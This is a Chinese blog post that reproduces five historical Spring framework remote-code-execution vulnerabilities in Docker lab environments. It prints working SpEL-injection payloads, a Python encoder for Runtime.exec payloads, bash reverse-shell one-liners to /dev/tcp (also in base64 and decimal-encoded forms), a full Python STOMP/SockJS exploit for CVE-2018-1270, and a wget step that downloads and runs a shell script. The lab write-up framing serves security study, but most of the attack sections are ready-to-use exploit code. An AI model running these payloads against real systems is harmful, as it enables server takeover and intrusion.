spring框架历史漏洞复现

最新推荐文章于 2024-08-07 19:33:53 发布
最新推荐文章于 2024-08-07 19:33:53 发布
阅读量4k 收藏 3
点赞数 1
文章标签: docker 容器 运维 spring web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54431413/article/details/125414695
版权

目录

一、docker

1.启动docker

2.列出容器

3.关闭容器

4.进入docker

二、CVE-2016-4977

原理:

1.登陆

2.访问url

 3.构造payload

4.测试

5.反弹shell

 6.编码后的命令结合poc

 三、CVE-2017-4971

原理:

1.初始界面

2.burp抓包

3.post提交payload

4.成功反弹

四、CVE-2017-8046

原理:

1.验证漏洞

2.burp抓包

3.反弹shell

(1)bash -i产生交互shell

 (2)burp构造语句

(3)监听端口反弹成功

五、CVE-2018-1270

1.原理:

2.版本:

3.exp:

4.复现

六、 CVE-2018-1273

1.原理

2.可能存在版本

3.复现

(1)访问

(2)burp抓包加入payload

(3)docker内查看

 (4)反弹shell

一、docker

1.启动docker

sudo docker-compose up -d

2.列出容器

sudo docker ps

3.关闭容器

sudo docker stop docker-name

4.进入docker

docker exec -it docker-name /bin/bash

二、CVE-2016-4977

原理:

Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。

1.登陆

2.访问url

http://192.168.29.132:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test

随便搞个用户名密码,出现以下界面,证明有spring漏洞

 3.构造payload

poc代码:

message = input('Enter message to encode:')
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
    poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ')}'
print(poc)

 生成了payload代码

4.测试

显示出unixprocess@629f0be表示成功的执行了我们输入的命令whoami

5.反弹shell

需要进行绕过exec()变形

bash -i >& /dev/tcp/192.168.1.2/5555 0>&1

 最后一个&表示1是标准输出,而不是文件

 6.编码后的命令结合poc

再次在response_type处进行payload的注入,拿到一个root的shell

 三、CVE-2017-4971

原理:

Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),肯定常用于购物网站,可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。

1.初始界面

2.burp抓包

进行登录,一步步预定,confirm处抓包即可

3.post提交payload

要经过url编码

_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.0.105/5555+0>%261")).start()=vulhub

4.成功反弹

四、CVE-2017-8046

原理:

官方:Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现[RFC6902](https://tools.ietf.org/html/rfc6902)),json数据中的path的值被传入`setValue`,导致执行了SpEL表达式,触发远程命令执行漏洞。

Spring-Data-REST-RCE(CVE-2017-8046),Spring Data REST对PATCH方法处理不当,导致攻击者能够利用JSON数据造成RCE。本质还是因为spring的SPEL解析导致的RCE

1.验证漏洞

输入/customers/1 出现以下界面就是有漏洞

2.burp抓包

3.反弹shell

(1)bash -i产生交互shell

bash -i >& /dev/tcp/192.168.0.105/5555 0>&1

转换后的payload

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1LzU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}

而且在源码中的注入位置要求是十进制,所以转化为十进制

",".join(map(str, (map(ord,"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA1LzU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}"))))
98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,65,117,77,84,65,49,76,122,85,49,78,84,85,103,77,68,52,109,77,81,111,75,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125

 (2)burp构造语句

[
 { "op": "replace", 
   "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,73,53,76,106,69,122,77,105,56,49,78,84,85,49,73,68,65,43,74,106,69,75,67,103,111,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastname",
   "value": "vulhub" 
 }
]

(3)监听端口反弹成功

五、CVE-2018-1270

1.原理:

官方:spring messaging为spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用`StandardEvaluationContext`解析,造成命令执行漏洞。

Spring Messaging 命令执行漏洞(CVE-2018-1270),Spring框架中的 spring-messaging 模块提供了一种基于WebSocket的STOMP协议实现,STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞,攻击者可以通过构造恶意的消息来实现远程代码执行。

2.版本:

Spring Framework 5.0 - 5.0.5 Spring Framework 4.3 - 4.3.15

3.exp:

有大佬写好的exp,所以直接利用即可

#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import json
 
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
 
def random_str(length):
    letters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters) for c in range(length))
 
 
class SockJS(threading.Thread):
    def __init__(self, url, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
        self.daemon = True
        self.session = requests.session()
        self.session.headers = {
            'Referer': url,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
        }
        self.t = int(time.time()*1000)
 
    def run(self):
        url = f'{self.base}/htmlfile?c=_jp.vulhub'
        response = self.session.get(url, stream=True)
        for line in response.iter_lines():
            time.sleep(0.5)
     
    def send(self, command, headers, body=''):
        data = [command.upper(), '\n']
 
        data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))
         
        data.append('\n\n')
        data.append(body)
        data.append('\x00')
        data = json.dumps([''.join(data)])
 
        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
        if response.status_code != 204:
            logging.info(f"send '{command}' data error.")
        else:
            logging.info(f"send '{command}' data success.")
 
    def __del__(self):
        self.session.close()
 
 
sockjs = SockJS('http://192.168.1.10:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)
 
sockjs.send('connect', {
    'accept-version': '1.1,1.0',
    'heart-beat': '10000,10000'
})
sockjs.send('subscribe', {
    'selector': "touch /tmp/success",
    'id': 'sub-0',
    'destination': '/topic/greetings'
})
 
data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
    'content-length': len(data),
    'destination': '/app/hello'
}, data)

4.复现

由于本机没有python3.6环境,所以直接在unbuntu用回环地址本机执行,可以看出在/tmp下创建了success文件。

六、 CVE-2018-1273

1.原理

官方:Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。

Spring Data Commons远程命令执行(CVE-2018-1273),当用户在项目中利用了Spring-data的相关web特性对用户的输入参数进行自动匹配的时候,会将用户提交的form表单的key值作为Spel的执行内容而产生漏洞

2.可能存在版本

Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) Spring Data REST 2.6 - 2.6.10 (Ingalls SR10) Spring Data Commons 2.0 to 2.0.5 (Kay SR5) Spring Data REST 3.0 - 3.0.5 (Kay SR5)

3.复现

(1)访问

http://192.168.29.132:8080/users

(2)burp抓包加入payload

这里是先执行一下touch /tmp/succcsddf,试一下能不能正常执行。

(3)docker内查看

 (4)反弹shell

这个不能直接命令执行来用bash -i 产生交互shell来反弹,我们在kali上构造一个bash.sh并开启一个http服务。

利用这个命令来下载bash.sh

/usr/bin/wget -qO /tmp/1 http://192.168.0.100:80/bash.sh

然后用下列命令来执行bash.sh

/bin/bash /tmp/1

成功执行反弹shell

梅_花_七
关注
若依框架漏洞(若依管理框架漏洞复现)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-28 4524
若依框架是一个 Java EE 企业级快速开发平台,基于经典技术组合(Spring Boot、Apache Shiro、MyBatis、Thymeleaf、Bootstrap),内置模块如:部门管理、角色用户、菜单及按钮授权、数据权限、系统参数、日志管理、通知公告等。在线定时任务配置;支持集群,支持多数据源,支持分布式事务。若依框架漏洞默认口令漏洞早期若依框架漏洞版本有反序列化漏洞 ,执行任意命令,漏洞复现,祭出fofa大法,fofa语法如下
Spring框架远程命令执行漏洞复现
xiaoMiao的博客
04-11 7157
Spring框架远程命令执行漏洞docker环境复现 记录篇~
Spring框架漏洞复现
Bird&Bird
12-03 2695
目录一、漏洞描述二、影响版本三、环境搭建四、漏洞复现4.1、漏洞验证4.2、编写POC4.3、执行payload4.4、反弹shell 一、漏洞描述 Spring Security OAuth2是为Spring框架提供安全认证支持的一个模块。当用户使用Whitelabel views来处理错误时,攻击者可以在被授权的情况下通过构造恶意SpEL表达式来远程执行命令。故是在需要知道账号密码的前提下才可以利用该漏洞。 二、影响版本 Spring Security OAuth 2.0 – 2.0.9 Spring
Spring框架漏洞(附修复方法)
最新发布
C233333235的博客
08-07 848
Spring是Java EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架
SpringBoot历史漏洞复现_springboot漏洞,2024年最新真的醉了
m0_62289824的博客
04-15 2539
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~(img-yTSj4IpJ-1713175561720)]//转化的格式base。//反弹shell脚本。
spring漏洞复现(cve-2022-22947,cve-2022-22963,cve-2022-22965)
qq_57939909的博客
08-30 1350
spring漏洞复现
spring(CVE-2018-1273)远程代码执行漏洞复现
勤劳的码农的博客
03-12 1万+
Spring Data 是Spring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
漏洞复现-Ruoyi若依系列
aming小老弟
05-02 2万+
官方漏洞历史文档。
框架漏洞-CVE复现-Node.JS+Jquery+Django+Flask
xiaoheizi的博客
07-18 829
Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。访问:/admin/vuln/collection/?描述:Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统命令。添加请求路径:/static/../../../a/../../../../etc/passwd 成功获取敏感信息。
【网络安全Spring框架漏洞总结(一)
顶峰
12-22 495
Spring是Java EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架
BladeX企业级开发平台 error/list SQL 注入漏洞复现
0xSec
03-12 1210
BladeX企业级开发平台 /api/blade-log/error/list路径存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SpringBoot历史漏洞复现_springboot漏洞,经典实战教程
m0_60707685的博客
04-08 3536
2.找到属性名,使用bp抓包,抓/jolokia的包,发送到重发模块,修改包为post请求,把传输的变量改json,然后加上下面的poc,重放这个包,明文值结果包含 在 response 数据包中的 value 键中。注意:每个1.x 版本和2.x 版本不同。
Spring Framework 漏洞复现
Miss的博客
04-14 4562
环境搭建 拉取镜像进入靶场:docker pull vulfocus/spring-core-rce-2022-03-29:latest 运行:docker run -itd -p 8090:8080 vulfocus/spring-core-rce-2022-03-29:lateast 漏洞复现 访问:http://IP:8090/ 利用链是修改TOMCAT日志,向日志中写入shell。 这里最重要的是data部分,依次发送五个请求。访问Tomcat日志,设置suffix后缀,设置路径webapp/ro
SpringBoot历史漏洞复现
weixin_53747497的博客
04-01 7203
Spring框架为开发Java应用程序提供了全面的基础架构支持。它包含一些很好的功能,如依赖注入和开 箱即用的模块,如:Spring JDBC 、Spring MVC 、Spring Security、 Spring AOP 、Spring ORM 、 Spring Test,这些模块缩短应用程序的开发时间,提高了应用开发的效率例如,在Java Web开发的早 期阶段,我们需要编写大量的代码来将记录插入到数据库中。
Spring框架漏洞复现大杂烩!!!
热门推荐
SoulCat
02-27 2万+
Spring框架漏洞复现大杂烩!!! 寻了半生的春天 你一笑 便是了 总体概述: Spring是一个开源框架,核心是控制反转(IoC)和面向切面(AOP)。简单来说,Spring是一个分层的JavaSE/EE full-stack(一站式) 轻量级开源框架。简单说就是创建对象由以前的程序员自己new 构造方法来调用,变成交由Spring来创建对象 。类比Struts 2框架绝大部分的安全漏洞...
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
Blue的博客
06-22 2118
Spring Framework存在远程代码执行漏洞,在 JDK 9 及以上版本环境下,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行漏洞
我滴个乖乖,我复现Spring漏洞,害怕!
Java后端技术
04-02 257
往期热门文章:1、小学生们在B站讲算法,网友:我只会阿巴阿巴 2、Spring爆出比Log4j2还大的漏洞? 3、Objects.equals 有坑!!! 4、Redis 官方可视化工具,功能真心强大! 5、xxl-job 和 ElasticJob比,谁牛?前天发布了《Spring爆出比Log4j2还大的漏洞?》这篇文章,没想到阅读量居然这么高。这篇文章其实是我那天晚上知...
Spring Framework UriComponentsBuilder URL解析不当漏洞复现(CVE-2024-22259)
m0_50797689的博客
03-15 1493
Spring Framework UriComponentsBuilder URL解析不当漏洞复现(CVE-2024-22259)
spring相关漏洞复现
Shanfenglan's blog
12-30 1241
文章目录1. H2 Database web端未授权访问导致的rce2. Spring Security OAuth2 rce -- CVE-2016-49773. Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)4. Spring Data Commons 远程命令执行漏洞(CVE-2018-1273) 1. H2 Database web端未授权访问导致的rce 2. Spring Security OAuth2 rce – CVE-2016-4977 Spring Se
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅_花_七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值